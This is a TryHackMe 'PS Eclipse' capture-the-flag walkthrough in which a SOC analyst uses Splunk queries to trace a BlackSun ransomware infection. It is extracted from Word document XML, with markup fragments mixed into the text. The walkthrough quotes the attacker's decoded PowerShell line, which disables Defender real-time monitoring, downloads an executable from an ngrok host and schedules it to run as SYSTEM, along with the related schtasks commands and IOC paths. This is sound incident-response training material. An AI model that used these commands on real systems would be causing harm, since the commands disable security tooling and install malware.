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wgzqq4stbf4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PS Eclipse — TryHackMe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Scenario: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You are a SOC Analyst for an MSSP (Managed Security Service Provider) company called </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">TryNotHackMe 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 customer sent an email asking for an analyst to investigate the events that occurred on Keegan’s machine on </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Monday, May 16th, 2022 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. The client noted that </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">the machine </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">is operational, but some files have a weird file extension. The client is worried that there was a ransomware attempt on Keegan’s device.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000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Your manager has tasked you to check the events in Splunk to determine what occurred in Keegan’s device.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usual, before starting the investigation, let us look at the source types available.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91465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Heading4"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="40" w:before="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_byxpz59maijb" w:id="1"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Tasks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 suspicious binary was downloaded to the endpoint. What was the name of the binary?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start by looking at the file creation events on the victims machine.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index=* sourcetype="WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=11 User="DESKTOP-TBV8NEF\\keegan"  Image!="C:\\Users\\keegan\\AppData\\Local\\Microsoft\\OneDrive\\Update\\OneDriveSetup.exe"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|table Image TargetFilename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above command displays the files created and which program created these files. It also removes some of the legitimate processes to reduce the number of events.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533525"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="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533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see that PowerShell is creating an executable in the Temp folder which is very suspicious. Let us examine this further.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index=* Image="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"   User="DESKTOP-TBV8NEF\\keegan"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| table ParentCommandLine CommandLine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| where isnotnull(ParentCommandLine) AND isnotnull(CommandLine)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076325"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="1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76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we can see there were some encoded commands executeded on the victims system. Let us decode these to see what exactly are these commands doing.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019300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="1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we can see this command is downloading the exe file and creating a scheduled task to execute it.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OUTSTANDING_GUTTER.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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2. What is the address the binary was downloaded from? Add http:// to your answer &amp; defang the URL.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get this from the decoded script block above.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Set-MpPreference -DisableRealtimeMonitoring $true;wget http://886e-181-215-214-32.ngrok.io/OUTSTANDING_GUTTER.exe -OutFile C:\Windows\Temp\OUTSTANDING_GUTTER.exe;SCHTASKS /Create /TN "OUTSTANDING_GUTTER.exe" /TR "C:\Windows\Temp\COUTSTANDING_GUTTER.exe" /SC ONEVENT /EC Application /MO *[System/EventID=777] /RU "SYSTEM" /f;SCHTASKS /Run /TN "OUTSTANDING_GUTTER.exe"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466850"/>
            <wp:effectExtent b="0" l="0" r="0" t="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66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hxxp[://]886e-181–215–214–32[.]ngrok[.]io/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3. What Windows executable was used to download the suspicious binary? Enter full path.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add the Image field to the table in question 1.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index=* Image="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"   User="DESKTOP-TBV8NEF\\keegan"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| table _time Image ParentCommandLine CommandLine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| where isnotnull(ParentCommandLine) AND isnotnull(CommandLine)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152525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C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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4. What command was executed to configure the suspicious binary to run with elevated privileges?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We can filter process creation logs which contain our executable.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index=* "Outstanding_Gutter.exe" sourcetype="WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=1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| table _time User Image CommandLine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933575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933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“C:\Windows\system32\schtasks.exe” /Create /TN OUTSTANDING_GUTTER.exe /TR C:\Windows\Temp\COUTSTANDING_GUTTER.exe /SC ONEVENT /EC Application /MO *[System/EventID=777] /RU SYSTEM /f</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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5. What permissions will the suspicious binary run as? What was the command to run the binary with elevated privileges? (Format: User + ; + CommandLine)</w:t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6858000" cy="676275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76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NT AUTHORITY\SYSTEM;”C:\Windows\system32\schtasks.exe” /Run /TN OUTSTANDING_GUTTER.exe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6. The suspicious binary connected to a remote server. What address did it connect to? Add http:// to your answer &amp; defang the URL.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Filter the events with the image “C:\Windows\Temp\OUTSTANDING_GUTTER.exe”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index=* Image="C:\\Windows\\Temp\\OUTSTANDING_GUTTER.exe"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371725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the interesting fields section, there is a field named TaskCategory, which has DNS query category, let us add this category to our filter.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638425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index=* Image="C:\\Windows\\Temp\\OUTSTANDING_GUTTER.exe" TaskCategory="Dns query (rule: DnsQuery)"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38125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81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Again in the interesting fields section we can see the “QueryName” field, which contains the URL requested.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885950"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="1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hxxp[://]9030–181–215–214–32[.]ngrok[.]io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7. A PowerShell script was downloaded to the same location as the suspicious binary. What was the name of the file?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Let us filter for files created in the same folder as the above executable.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index=* TargetFilename="C:\\Windows\\Temp\\*.ps1"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| dedup TargetFilename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| table _time Image TargetFilename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495425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495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There are 5 results. We need to narrow it down to one. So let us check the hashes of these files and verify them with VirusTotal to find the malicious script.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index=* TargetFilename="C:\\Windows\\Temp\\*.ps1"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| dedup TargetFilename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228975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8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Copy the hash from above and Submit to VirusTotal.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26695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266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As we can see above , the file script.ps1 is malicious.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 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Script.ps1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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8. The malicious script was flagged as malicious. What do you think was the actual name of the malicious script?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VirusTotal the script was detected as BlackSun malware, so the name could be BlackSun.ps1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3076575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07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BlackSun.ps1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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9. A ransomware note was saved to disk, which can serve as an IOC. What is the full path to which the ransom note was saved?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searched for the file creation event with event id 11 and the most common ransomware note extension which is txt. I also added Image as powershell as the ransomware file was a powershell script.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index=* EventCode=11 *.txt Image="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"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2438400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="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3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C:\Users\keegan\Downloads\vasg6b0wmw029hd\BlackSun_README.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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 The script saved an image file to disk to replace the user’s desktop wallpaper, which can also serve as an IOC. What is the full path of the image?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 just replaced the .txt extension with jpg or png.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index=* EventCode=11 (*.jpg OR *.png) Image="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"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6858000" cy="1343025"/>
            <wp:effectExtent b="0" l="0" r="0" t="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Answer:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> C:\Users\Public\Pictures\blacksun.jpg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is the end of this walkthrough.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11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14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8.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11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1.png"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13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